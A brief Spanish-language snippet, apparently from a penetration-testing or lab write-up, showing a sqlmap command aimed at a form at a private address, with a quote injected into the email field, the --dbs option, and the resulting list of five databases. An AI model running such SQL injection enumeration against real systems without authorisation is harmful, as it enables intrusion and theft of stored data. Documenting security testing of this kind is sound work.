**Comando base:** `sqlmap -u "http://192.168.0.17/list/" --data="name=ZAP&email=%27zap@zap.com&phone=ZAP&org=ZAP"`

**Opción adicional:** `--dbs`

**Resultado:**
```
available databases [5]:
[*] contacts
[*] drupal
[*] information_schema
[*] mysql
[*] test
```
